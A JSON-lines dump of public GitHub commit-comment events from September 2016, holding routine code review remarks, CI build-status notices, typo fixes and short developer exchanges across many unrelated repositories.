{"id":"4506028698","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18873162,"position":null,"line":null,"path":null,"commit_id":"6260a69fb9253c437660f363515c01d8807fadec","created_at":"2016-09-02T01:07:06Z","updated_at":"2016-09-02T01:07:06Z","body":"os_2_0_develop (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6260a69fb9253c437660f363515c01d8807fadec-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6260a69fb9253c437660f363515c01d8807fadec-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-02T01:07:06Z"}
{"id":"4506030616","type":"CommitCommentEvent","actor":{"login":"chengweiv5"},"repo":{"name":"ceph/ceph"},"payload":{"comment":{"id":18873166,"position":4,"line":228,"path":".organizationmap","commit_id":"9ff3292b932124fc1d418c456d21338cc6df8ba2","created_at":"2016-09-02T01:07:45Z","updated_at":"2016-09-02T01:07:45Z","body":"iQiyi -> iQIYI, thanks"}},"created_at":"2016-09-02T01:07:45Z"}
{"id":"4506032825","type":"CommitCommentEvent","actor":{"login":"justinmk"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":18873169,"position":null,"line":null,"path":null,"commit_id":"af161dcfb88f2a6886f9e0a7fbfe24cd58c3f658","created_at":"2016-09-02T01:08:32Z","updated_at":"2016-09-02T01:08:32Z","body":"@borring run make `helptags` at the project root. Any remaining makefiles except the top level makefile, are legacy accidents.\r\n\r\nIs there a technical reason this is needed ?"}},"created_at":"2016-09-02T01:08:32Z"}
{"id":"4506037435","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18873185,"position":20,"line":386,"path":"common/network-common/src/test/java/org/apache/spark/network/sasl/SparkSaslSuite.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-02T01:10:14Z","updated_at":"2016-09-02T01:10:14Z","body":"Can you make it parameterized test since we have \"AES/CTR/NoPadding\" and \"AES/CBC/NoPadding\" supported transformation?"}},"created_at":"2016-09-02T01:10:14Z"}
{"id":"4506040484","type":"CommitCommentEvent","actor":{"login":"aslakknutsen"},"repo":{"name":"almighty/almighty-core"},"payload":{"comment":{"id":18873197,"position":22,"line":20,"path":"Dockerfile.deploy","commit_id":"bfa03ea6fabb016b4a4a943e1a04fc18893dff3e","created_at":"2016-09-02T01:11:18Z","updated_at":"2016-09-02T01:11:18Z","body":"Changed in https://github.com/almighty/almighty-core/commit/3c14178ade2d174d7e930ba8a370c37889dd17d8"}},"created_at":"2016-09-02T01:11:18Z"}
{"id":"4506043005","type":"CommitCommentEvent","actor":{"login":"johnliz4ever"},"repo":{"name":"johnliz4ever/Surround360"},"payload":{"comment":{"id":18873213,"position":null,"line":null,"path":null,"commit_id":"a9b41414779aacc76769f31a83fbdd9a5ab6fa0c","created_at":"2016-09-02T01:12:15Z","updated_at":"2016-09-02T01:12:15Z","body":"nditional_decorator(pred, dec): return lambda fn: dec(fn) if pred else fn\r\n  \"\"\"\t\t  \"\"\"\r\n  \t\t  \r\n  FFMPEG_COMMAND_TEMPLATE = \"\"\"\t\t  FFMPEG_COMMAND_TEMPLATE = \"\"\"\r\n -time ./ffmpeg\r\n\t\t  -y\r\n  -framerate 30\t\t  -framerate 30\r\n  -i {DEST_DIR}/eqr_preview/%06d.jpg\t\t\r\n@@ -39,7 +39,7 @@ def conditional_decorator(pred, dec): return lambda fn: dec(fn) if pred else fn\r\n  \"\"\"\t\t  \"\"\"\r\n  \t\t  \r\n  FFMPEG_COMMAND_TEMPLATE = \"\"\"\t\t  FFMPEG_COMMAND_TEMPLATE = \"\"\"\r\n -time ./ffmpeg\t\t +time ffmpeg\r\n  -y\t\t  -y\r\n  -framerate 30\t\t  -framerate 30\r\n  -i {DEST_DIR}/eqr_preview/%06d.jpg\t\t  -i {DEST_DIR}/eqr_preview/%06d.jpg\r\n  Unlock conversation\r\n0 comments on commit a9b4141\r\n@johnliz4ever\r\n  \r\n            \r\n \r\nWrite  Preview\r\n\r\nnditional_decorator(pred, dec): return lambda fn: dec(fn) if pred else fn\r\n  \"\"\"\t\t  \"\"\"\r\n  \t\t  \r\n  FFMPEG_COMMAND_TEMPLATE = \"\"\"\t\t  FFMPEG_COMMAND_TEMPLATE = \"\"\"\r\n -time ./ffmpeg\r\n\t\t  -y\r\n  -framerate 30\t\t  -framerate 30\r\n  -i {DEST_DIR}/eqr_preview/%06d.jpg\t\t\r\n\t\t  -y\r\n  -framerate 30\r\n\"\"\r\n -time ./ffmpeg\t\t +time ffmpeg\r\n  -y\t\t  -y\r\n  -framerate 30\t\t  -framerate 30\r\n  -i {DEST_DIR}/eqr_preview/%06d.jpg\t\t  -i {DEST_DI\r\n![10354686_10150004552801856_220367501106153455_n](https://cloud.githubusercontent.com/assets/20790272/18189397/299c364e-7080-11e6-89f6-b8bedeb7edd7.jpg)\r\n![jkecvpzfk-2](https://cloud.githubusercontent.com/assets/20790272/18189401/3374c6f4-7080-11e6-9abe-74b7fa27cb87.gif)\r\n![-paxp-deije](https://cloud.githubusercontent.com/assets/20790272/18189410/3f689f08-7080-11e6-9f49-370fdd1b0a0b.gif)\r\n![jkecvpzfk-2](https://cloud.githubusercontent.com/assets/20790272/18189413/46d854e0-7080-11e6-9eda-8dc4b463aec6.gif)\r\n![xgwwmbfcsd6](https://cloud.githubusercontent.com/assets/20790272/18189417/50c0e29c-7080-11e6-9995-aad3334010ec.png)\r\n![xgwwmbfcsd6](https://cloud.githubusercontent.com/assets/20790272/18189421/5f09718e-7080-11e6-8c2b-831b1e5fd859.png)\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-02T01:12:15Z"}
{"id":"4506043822","type":"CommitCommentEvent","actor":{"login":"alvarollmenezes"},"repo":{"name":"prodest/api-detran"},"payload":{"comment":{"id":18873219,"position":null,"line":null,"path":null,"commit_id":"4b1890d02a923b83d678901f983f77ea15d06df6","created_at":"2016-09-02T01:12:34Z","updated_at":"2016-09-02T01:12:34Z","body":"Closes prodest/es-na-palma-da-mao-backend#23"}},"created_at":"2016-09-02T01:12:34Z"}
{"id":"4506045294","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18873228,"position":9,"line":61,"path":"ficbot.js","commit_id":"3f59ee8a7f4c2bdeafe6983d9cd63fa14fbcb9e7","created_at":"2016-09-02T01:13:07Z","updated_at":"2016-09-02T01:13:07Z","body":"Previously had\r\n```\r\nlatex = latex.replace(/&/g, '\\\\&')\r\n             .replace(/%/g, '\\\\%')\r\n             .replace(/\\$/g, '\\\\$')\r\n             .replace(/#/g, '\\\\#')\r\n             .replace(/_/g, '\\\\_')\r\n             .replace(/~/g, '\\\\~')\r\n             .replace(/\\^/g, '\\\\^')\r\n             .replace(/–/g, '\\\\-')\r\n```\r\n(not sure why I was escaping dash)"}},"created_at":"2016-09-02T01:13:07Z"}
{"id":"4506045408","type":"CommitCommentEvent","actor":{"login":"dkrprasetya"},"repo":{"name":"dkrprasetya/simple-firebase-unity"},"payload":{"comment":{"id":18873229,"position":null,"line":null,"path":null,"commit_id":"e0ea5d1ae30e7186112f9869870a0e517b2a6efb","created_at":"2016-09-02T01:13:09Z","updated_at":"2016-09-02T01:13:09Z","body":"Hi abtinr,\r\n\r\nThanks for visiting my repository.\r\n\r\nI'm sorry that currently this implementation is limited for the usage of Real-Time Database (through REST), so analytics is not (yet?) included.\r\n\r\nFor now I only could give suggestions on how to achieve that. \r\n\r\nYou probably need to touch the native side of your project, plug the native Firebase's SDK, then make a method on native's side that you will call from Unity's script. The explanation on this link should be clear enough (this is an example for Android): https://stackoverflow.com/questions/37497363/google-firebase-analytics-plugin-for-unity/37542476#37542476\r\n\r\nHope this helps!"}},"created_at":"2016-09-02T01:13:09Z"}
{"id":"4506050107","type":"CommitCommentEvent","actor":{"login":"CraziFuzzy"},"repo":{"name":"OpenSageTV/sagetv-plugin-repo"},"payload":{"comment":{"id":18873246,"position":null,"line":null,"path":null,"commit_id":"e4e9dd9fc3862b05aae700ec18fcb8ccbafc9a31","created_at":"2016-09-02T01:14:55Z","updated_at":"2016-09-02T01:14:55Z","body":"No worries - just delayed the fix for a day - the dev xml i posted will work for anyone in the meantime."}},"created_at":"2016-09-02T01:14:55Z"}
{"id":"4506051687","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18873268,"position":null,"line":null,"path":null,"commit_id":"e3cfabe66bbe43582e2dc43ff63f8ed0e0fcb9dc","created_at":"2016-09-02T01:15:29Z","updated_at":"2016-09-02T01:15:29Z","body":"To typestrs no, the extra 0 yes, just did it :)\r\n\r\nSPAWN_UNDEF means a spawn point with a period, which is not 1 hour and couldn't be recognized, SPAWN_DEF means a period of 1 hour and was meant to be a type between undef and the actual types but never to be written to the learning file. But when the interval is too low or the learning phase isn't correctly executed, it'll result in SPAWN_UNDEF and SPAWN_DEF being in the file, type -1 and type 1."}},"created_at":"2016-09-02T01:15:29Z"}
{"id":"4506053344","type":"CommitCommentEvent","actor":{"login":"KickButtowski80"},"repo":{"name":"KickButtowski80/yelpdemo"},"payload":{"comment":{"id":18873277,"position":null,"line":null,"path":null,"commit_id":"7046b02b87792178b8f15df5de8109b3e82c277b","created_at":"2016-09-02T01:16:07Z","updated_at":"2016-09-02T01:16:07Z","body":"unsafe "}},"created_at":"2016-09-02T01:16:07Z"}
{"id":"4506056434","type":"CommitCommentEvent","actor":{"login":"Jdwilson78"},"repo":{"name":"Jdwilson78/JD-Wilson"},"payload":{"comment":{"id":18873283,"position":null,"line":null,"path":null,"commit_id":"4d8df9e5e20c49bd7f6ff0176e62da220ee9796f","created_at":"2016-09-02T01:17:13Z","updated_at":"2016-09-02T01:17:13Z","body":"Hello, and I welcome you to the my website."}},"created_at":"2016-09-02T01:17:13Z"}
{"id":"4506057514","type":"CommitCommentEvent","actor":{"login":"JedWatson"},"repo":{"name":"keystonejs/keystone-storage-namefunctions"},"payload":{"comment":{"id":18873285,"position":null,"line":null,"path":null,"commit_id":"dc3ef5cc0ea632dac7b2f48a6104c21da8033566","created_at":"2016-09-02T01:17:35Z","updated_at":"2016-09-02T01:17:35Z","body":"Good catch, thanks - I missed that. I think ditching the underscore prefix syntax makes it clearer with these methods being encapsulated externally... the line between a \"private\" and \"public\" method can get pretty blurry.\r\n\r\nUnless you disagree? I'm finding it hard to figure out which way to go and am not opposed to putting them back everywhere if you think that makes it clearer. Consistency is the only thing that's really important."}},"created_at":"2016-09-02T01:17:35Z"}
{"id":"4506059501","type":"CommitCommentEvent","actor":{"login":"will"},"repo":{"name":"lindseybradford/bottle_admin_fed"},"payload":{"comment":{"id":18873287,"position":8,"line":43,"path":"dist/index.html","commit_id":"9f551c289d22225b485219009968c0116630368b","created_at":"2016-09-02T01:18:21Z","updated_at":"2016-09-02T01:18:21Z","body":"Which sidebar?\n\nOn Thursday, September 1, 2016, Lindsey Bradford <notifications@github.com>\nwrote:\n\n> @will <https://github.com/will> - this 'sc_wr\" is the wrapper that you'll\n> need to make the sidebar scroll on overflow properly.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/lindseybradford/bottle_admin_fed/commit/9f551c289d22225b485219009968c0116630368b#commitcomment-18872981>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAAHtc4erxmtLZpBYetcL9WQxxwy3kwEks5ql3BagaJpZM4JzQ-M>\n> .\n>\n"}},"created_at":"2016-09-02T01:18:21Z"}
{"id":"4506061527","type":"CommitCommentEvent","actor":{"login":"Ianisthebest"},"repo":{"name":"Ianisthebest/RedSquare"},"payload":{"comment":{"id":18873292,"position":null,"line":null,"path":null,"commit_id":"3b5cbffcb010728ee5d092f9c5ff321e61622f0e","created_at":"2016-09-02T01:19:12Z","updated_at":"2016-09-02T01:19:12Z","body":"nice change!"}},"created_at":"2016-09-02T01:19:12Z"}
{"id":"4506065555","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-client-ruby"},"payload":{"comment":{"id":18873305,"position":7,"line":43,"path":"lib/killbill_client/models/overdue.rb","commit_id":"58d2c0f0075a1ca27235e2dd142ddce1c4e19f21","created_at":"2016-09-02T01:20:43Z","updated_at":"2016-09-02T01:20:43Z","body":"Since it's similar to `upload_tenant_overdue_config` above (modulo the content-type), maybe we can share some of the code?\r\n\r\nAlso, how about renaming it `update` (for consistency with other models, like account)?"}},"created_at":"2016-09-02T01:20:43Z"}
{"id":"4506067928","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":18873315,"position":17,"line":80,"path":"app/controllers/kaui/admin_tenants_controller.rb","commit_id":"aa9dead1a763217f8bf5e586b74956bbedd01f0c","created_at":"2016-09-02T01:21:37Z","updated_at":"2016-09-02T01:21:37Z","body":"Do you need `@catalogs` in the rescue block? `rescue []` should work."}},"created_at":"2016-09-02T01:21:37Z"}
{"id":"4506074422","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":18873348,"position":45,"line":145,"path":"app/controllers/kaui/admin_tenants_controller.rb","commit_id":"aa9dead1a763217f8bf5e586b74956bbedd01f0c","created_at":"2016-09-02T01:24:13Z","updated_at":"2016-09-02T01:24:13Z","body":"Looks like this code is pretty much needed everywhere in this controller, worth extracting?"}},"created_at":"2016-09-02T01:24:13Z"}
{"id":"4506076742","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":18873362,"position":22,"line":22,"path":"app/views/kaui/admin_tenants/new_overdue_config.html.erb","commit_id":"aa9dead1a763217f8bf5e586b74956bbedd01f0c","created_at":"2016-09-02T01:25:04Z","updated_at":"2016-09-02T01:25:04Z","body":"Nit: space missing."}},"created_at":"2016-09-02T01:25:04Z"}
{"id":"4506078926","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":18873376,"position":43,"line":44,"path":"app/models/kaui/overdue.rb","commit_id":"aa9dead1a763217f8bf5e586b74956bbedd01f0c","created_at":"2016-09-02T01:25:59Z","updated_at":"2016-09-02T01:25:59Z","body":"Wow, fancy..."}},"created_at":"2016-09-02T01:25:59Z"}
{"id":"4506079303","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":18873378,"position":null,"line":null,"path":null,"commit_id":"aa9dead1a763217f8bf5e586b74956bbedd01f0c","created_at":"2016-09-02T01:26:09Z","updated_at":"2016-09-02T01:26:09Z","body":"👍 "}},"created_at":"2016-09-02T01:26:09Z"}
{"id":"4506083597","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":18873416,"position":37,"line":152,"path":"jaxrs/src/main/java/org/killbill/billing/jaxrs/resources/OverdueResource.java","commit_id":"63e6be7f07fc8e9e22cd374cf0d457a623177c4f","created_at":"2016-09-02T01:27:51Z","updated_at":"2016-09-02T01:27:51Z","body":"Worth changing the API?"}},"created_at":"2016-09-02T01:27:51Z"}
{"id":"4506084451","type":"CommitCommentEvent","actor":{"login":"bishosansaryal1"},"repo":{"name":"bishosansaryal1/index.html"},"payload":{"comment":{"id":18873417,"position":null,"line":null,"path":null,"commit_id":"722b6a1fad85ed496d0f720b40f066f428c2c3f4","created_at":"2016-09-02T01:28:13Z","updated_at":"2016-09-02T01:28:13Z","body":"Edited and Updated the repository readme file"}},"created_at":"2016-09-02T01:28:13Z"}
{"id":"4506084826","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":18873418,"position":35,"line":35,"path":"overdue/src/test/resources/OverdueConfig3.xml","commit_id":"63e6be7f07fc8e9e22cd374cf0d457a623177c4f","created_at":"2016-09-02T01:28:21Z","updated_at":"2016-09-02T01:28:21Z","body":"😊 "}},"created_at":"2016-09-02T01:28:21Z"}
{"id":"4506085463","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":18873419,"position":25,"line":25,"path":"overdue/src/test/resources/OverdueConfig3.xml","commit_id":"63e6be7f07fc8e9e22cd374cf0d457a623177c4f","created_at":"2016-09-02T01:28:35Z","updated_at":"2016-09-02T01:28:35Z","body":"Nit: typo (OD4)."}},"created_at":"2016-09-02T01:28:35Z"}
{"id":"4506085591","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":18873420,"position":null,"line":null,"path":null,"commit_id":"63e6be7f07fc8e9e22cd374cf0d457a623177c4f","created_at":"2016-09-02T01:28:37Z","updated_at":"2016-09-02T01:28:37Z","body":"👍 "}},"created_at":"2016-09-02T01:28:37Z"}
{"id":"4506090086","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"vshaxe/vshaxe"},"payload":{"comment":{"id":18873434,"position":null,"line":null,"path":null,"commit_id":"cf75e6c5c2301c59706301e2ffa9d691938bf898","created_at":"2016-09-02T01:30:21Z","updated_at":"2016-09-02T01:30:21Z","body":"@Gama11 @Simn you guys might want to reinstall node_modules for that. Also @Gama11, I can't seem to reproduce that issue with output channel popping up all of sudden, could you test that?"}},"created_at":"2016-09-02T01:30:21Z"}
{"id":"4506090388","type":"CommitCommentEvent","actor":{"login":"PikachuEXE"},"repo":{"name":"twilio/twilio-ruby"},"payload":{"comment":{"id":18873435,"position":4,"line":4,"path":"CHANGES.md","commit_id":"91508d96126ba8f3ac7c760ac7bd62427ed4a9a0","created_at":"2016-09-02T01:30:28Z","updated_at":"2016-09-02T01:30:28Z","body":"This should be `4.12.1`?\r\n\r\nAlso not seeing this commit in `master`\r\nIs it in another branch?"}},"created_at":"2016-09-02T01:30:28Z"}
{"id":"4506092557","type":"CommitCommentEvent","actor":{"login":"pexcn"},"repo":{"name":"aa65535/okhttputils"},"payload":{"comment":{"id":18873440,"position":10,"line":56,"path":"src/main/java/utils/okhttp/request/ParamsBuilder.java","commit_id":"c072a9c8e58f4cea0683534438b97cf6b185e90a","created_at":"2016-09-02T01:31:17Z","updated_at":"2016-09-02T01:31:17Z","body":"嗯～"}},"created_at":"2016-09-02T01:31:17Z"}
{"id":"4506092889","type":"CommitCommentEvent","actor":{"login":"chengweiv5"},"repo":{"name":"ceph/ceph"},"payload":{"comment":{"id":18873441,"position":4,"line":228,"path":".organizationmap","commit_id":"9ff3292b932124fc1d418c456d21338cc6df8ba2","created_at":"2016-09-02T01:31:24Z","updated_at":"2016-09-02T01:31:24Z","body":"oops, it did merged, iQiyi is fine."}},"created_at":"2016-09-02T01:31:24Z"}
{"id":"4506093871","type":"CommitCommentEvent","actor":{"login":"Zambom"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":18873444,"position":null,"line":null,"path":null,"commit_id":"77a54af5824d2abab2df587cef10133580895ab8","created_at":"2016-09-02T01:31:47Z","updated_at":"2016-09-02T01:31:47Z","body":"Ao meu ver vão haver mais páginas com esse código do que sem ele, então acredito ser melhor se ele ficar direto no base e nas páginas em que ele não deve aparecer simplesmente abre e fecha o bloco..."}},"created_at":"2016-09-02T01:31:47Z"}
{"id":"4506096074","type":"CommitCommentEvent","actor":{"login":"jasonkarns"},"repo":{"name":"cbishop-sstk/analytics.js-integration-google-tag-manager"},"payload":{"comment":{"id":18873447,"position":20,"line":85,"path":"lib/index.js","commit_id":"983278bc2afc9e85ddc9bc0b81ff11170f302d11","created_at":"2016-09-02T01:32:38Z","updated_at":"2016-09-02T01:32:38Z","body":"Not able to make this a private function? Seems icky making it public since there's no reason it should ever be invoked publicly."}},"created_at":"2016-09-02T01:32:38Z"}
{"id":"4506103225","type":"CommitCommentEvent","actor":{"login":"cbishop-sstk"},"repo":{"name":"cbishop-sstk/analytics.js-integration-google-tag-manager"},"payload":{"comment":{"id":18873459,"position":20,"line":85,"path":"lib/index.js","commit_id":"983278bc2afc9e85ddc9bc0b81ff11170f302d11","created_at":"2016-09-02T01:35:17Z","updated_at":"2016-09-02T01:35:17Z","body":"It was originally. Their contributor doc says they want everything on\nprototype. They have another function marked 'private' set up the same way.\n\nOn Sep 1, 2016 7:32 PM, \"Jason Karns\" <notifications@github.com> wrote:\n\n> Not able to make this a private function? Seems icky making it public\n> since there's no reason it should ever be invoked publicly.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/cbishop-sstk/analytics.js-integration-google-tag-manager/commit/983278bc2afc9e85ddc9bc0b81ff11170f302d11#commitcomment-18873447>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AUW_si4mIqGna8QXMrI9zr-Eeu8thPOcks5ql3y2gaJpZM4JzScS>\n> .\n>\n"}},"created_at":"2016-09-02T01:35:17Z"}
{"id":"4506114251","type":"CommitCommentEvent","actor":{"login":"q2dg"},"repo":{"name":"arduino-libraries/USBHost"},"payload":{"comment":{"id":18873484,"position":null,"line":null,"path":null,"commit_id":"36eb03011156c431ef96d936dd224ec917bd5c6b","created_at":"2016-09-02T01:39:39Z","updated_at":"2016-09-02T01:39:39Z","body":"Ei, in README.adoc you still mention Zero board while in library.properties you don't. Which text is the correct one??"}},"created_at":"2016-09-02T01:39:39Z"}
{"id":"4506115392","type":"CommitCommentEvent","actor":{"login":"stef1927"},"repo":{"name":"stef1927/cassandra"},"payload":{"comment":{"id":18873487,"position":78,"line":597,"path":"doc/native_protocol_v5.spec","commit_id":"4317844fccf3c940d456cc017b69f3485f467f18","created_at":"2016-09-02T01:40:05Z","updated_at":"2016-09-02T01:40:05Z","body":"Yes absolutely, it should be 0x0008, thanks!"}},"created_at":"2016-09-02T01:40:05Z"}
{"id":"4506118643","type":"CommitCommentEvent","actor":{"login":"amcorreia"},"repo":{"name":"deltaskelta/django"},"payload":{"comment":{"id":18873490,"position":6,"line":974,"path":"docs/ref/contrib/admin/index.txt","commit_id":"080d0554a0fb75563e3dd1aacdaa6da82e54e509","created_at":"2016-09-02T01:41:18Z","updated_at":"2016-09-02T01:41:18Z","body":"typo here? \"fiter\""}},"created_at":"2016-09-02T01:41:18Z"}
{"id":"4506118871","type":"CommitCommentEvent","actor":{"login":"anyefan"},"repo":{"name":"anyefan/test"},"payload":{"comment":{"id":18873493,"position":null,"line":null,"path":null,"commit_id":"6ce21e9130ed0084ab6eac27cfdf2d73961a7b24","created_at":"2016-09-02T01:41:24Z","updated_at":"2016-09-02T01:41:24Z","body":"mmmmmmmmmmmmmmm"}},"created_at":"2016-09-02T01:41:24Z"}
{"id":"4506122847","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18873502,"position":null,"line":null,"path":null,"commit_id":"a7ccf0eba04f202ca7ed5c0f85acd3dc1bcad5e9","created_at":"2016-09-02T01:42:56Z","updated_at":"2016-09-02T01:42:56Z","body":"Related to: backdrop/backdrop-issues#2113 backdrop/backdrop-issues#1924 "}},"created_at":"2016-09-02T01:42:56Z"}
{"id":"4506123168","type":"CommitCommentEvent","actor":{"login":"jbrown"},"repo":{"name":"kmicol/productSite"},"payload":{"comment":{"id":18873503,"position":1,"line":1,"path":"app/styles/app.css","commit_id":"c2b5a9ee0b44bf7d19f3da7d1fb62499097ad9cf","created_at":"2016-09-02T01:43:04Z","updated_at":"2016-09-02T01:43:04Z","body":"It's typically bad practice to add `id` and reference it in css, you should almost always use class names instead."}},"created_at":"2016-09-02T01:43:04Z"}
{"id":"4506123845","type":"CommitCommentEvent","actor":{"login":"tadatuta"},"repo":{"name":"bem/bem-components"},"payload":{"comment":{"id":18873505,"position":46,"line":35,"path":"design/common.blocks/spin/_theme/spin_theme_islands.post.css","commit_id":"e3a60a8c4e5414ec1f5b48ff99e1718e2fe05149","created_at":"2016-09-02T01:43:21Z","updated_at":"2016-09-02T01:43:21Z","body":"ok, let's keep `postcss-calc` and update this part"}},"created_at":"2016-09-02T01:43:21Z"}
{"id":"4506127689","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"julmot/diacritics"},"payload":{"comment":{"id":18873510,"position":null,"line":null,"path":null,"commit_id":"9aa56ee0153bfb7af528317c68627898e66a68e0","created_at":"2016-09-02T01:44:48Z","updated_at":"2016-09-02T01:44:48Z","body":"I'm probably getting ahead of myself here...\r\n\r\n* MIT license okay?\r\n* Everything here is likely to change, but I thought a basic structure would help get things rolling :wink: "}},"created_at":"2016-09-02T01:44:48Z"}
{"id":"4506137024","type":"CommitCommentEvent","actor":{"login":"milktrader"},"repo":{"name":"JuliaQuant/MarketData.jl"},"payload":{"comment":{"id":18873526,"position":null,"line":null,"path":null,"commit_id":"2b36390820e77938c28b1a7fb4fd11825367e67c","created_at":"2016-09-02T01:48:28Z","updated_at":"2016-09-02T01:48:28Z","body":"Gah, I hope it is."}},"created_at":"2016-09-02T01:48:28Z"}
{"id":"4506137263","type":"CommitCommentEvent","actor":{"login":"baifanwudi"},"repo":{"name":"baifanwudi/BigDataDemo"},"payload":{"comment":{"id":18873529,"position":null,"line":null,"path":null,"commit_id":"a4ef4d3534863635ff3b22b40467aff16e37d96f","created_at":"2016-09-02T01:48:34Z","updated_at":"2016-09-02T01:48:34Z","body":"java ml"}},"created_at":"2016-09-02T01:48:34Z"}
{"id":"4506139983","type":"CommitCommentEvent","actor":{"login":"deltaskelta"},"repo":{"name":"deltaskelta/django"},"payload":{"comment":{"id":18873541,"position":null,"line":null,"path":null,"commit_id":"080d0554a0fb75563e3dd1aacdaa6da82e54e509","created_at":"2016-09-02T01:49:40Z","updated_at":"2016-09-02T01:49:40Z","body":"Yes thanks for catching that. Now fixed"}},"created_at":"2016-09-02T01:49:40Z"}
{"id":"4506140186","type":"CommitCommentEvent","actor":{"login":"tryswilliams"},"repo":{"name":"tryswilliams/4103-101-OpSys-Williams"},"payload":{"comment":{"id":18873542,"position":7,"line":7,"path":"README.md","commit_id":"18d5140f0cf0da2e1cdde290882852b28f094382","created_at":"2016-09-02T01:49:46Z","updated_at":"2016-09-02T01:49:46Z","body":"![img_20160831_163242](https://cloud.githubusercontent.com/assets/17015568/18190099/9a3d6e7c-7085-11e6-80f9-316826a7e5ab.jpg)\r\n"}},"created_at":"2016-09-02T01:49:46Z"}
{"id":"4506142099","type":"CommitCommentEvent","actor":{"login":"timboudreau25"},"repo":{"name":"timboudreau25/M.S.-Applied-Econ-Works"},"payload":{"comment":{"id":18873548,"position":null,"line":null,"path":null,"commit_id":"1a3f0a0e358aa88411da84264a3ed1b85d722c89","created_at":"2016-09-02T01:50:29Z","updated_at":"2016-09-02T01:50:29Z","body":"Winter 2016 Quarter at UCSC"}},"created_at":"2016-09-02T01:50:29Z"}
{"id":"4506149279","type":"CommitCommentEvent","actor":{"login":"EdwardAngeles"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":18873555,"position":null,"line":null,"path":null,"commit_id":"5b96c3a5527c1b2989dbfbe625f1c763b8887334","created_at":"2016-09-02T01:53:11Z","updated_at":"2016-09-02T01:53:11Z","body":"Thanks for this.\r\nAre there any plans to implement a `is_key_just_pressed()` function?"}},"created_at":"2016-09-02T01:53:11Z"}
{"id":"4506149525","type":"CommitCommentEvent","actor":{"login":"milktrader"},"repo":{"name":"JuliaQuant/MarketData.jl"},"payload":{"comment":{"id":18873556,"position":null,"line":null,"path":null,"commit_id":"2b36390820e77938c28b1a7fb4fd11825367e67c","created_at":"2016-09-02T01:53:19Z","updated_at":"2016-09-02T01:53:19Z","body":"Well, it failed on travis so this didn't fix it ..."}},"created_at":"2016-09-02T01:53:19Z"}
{"id":"4506153651","type":"CommitCommentEvent","actor":{"login":"Obooman"},"repo":{"name":"hswolff/BetterWeather"},"payload":{"comment":{"id":18873563,"position":null,"line":null,"path":null,"commit_id":"6a51bce269c58f14f59e6f00dd362ce281a2b19f","created_at":"2016-09-02T01:54:55Z","updated_at":"2016-09-02T01:54:55Z","body":"You did awesome work!Good job!"}},"created_at":"2016-09-02T01:54:55Z"}
{"id":"4506153978","type":"CommitCommentEvent","actor":{"login":"milktrader"},"repo":{"name":"JuliaQuant/MarketData.jl"},"payload":{"comment":{"id":18873565,"position":null,"line":null,"path":null,"commit_id":"2b36390820e77938c28b1a7fb4fd11825367e67c","created_at":"2016-09-02T01:55:04Z","updated_at":"2016-09-02T01:55:04Z","body":"````\r\nERROR: LoadError: New tag 0.3.8 of package MarketData requires julia 0.4.0, but version 0.3.0 of MarketData requires julia 0.3.0. Use a new minor package version when support for an old version of Julia is dropped. Re-tag the package as 0.4.0 using `Pkg.tag(\"MarketData\", :minor)`.\r\n in error at error.jl:22\r\n````"}},"created_at":"2016-09-02T01:55:04Z"}
{"id":"4506155550","type":"CommitCommentEvent","actor":{"login":"milktrader"},"repo":{"name":"JuliaQuant/MarketData.jl"},"payload":{"comment":{"id":18873567,"position":null,"line":null,"path":null,"commit_id":"2b36390820e77938c28b1a7fb4fd11825367e67c","created_at":"2016-09-02T01:55:41Z","updated_at":"2016-09-02T01:55:41Z","body":"This test has become more sophisticated to be able to catch that. "}},"created_at":"2016-09-02T01:55:41Z"}
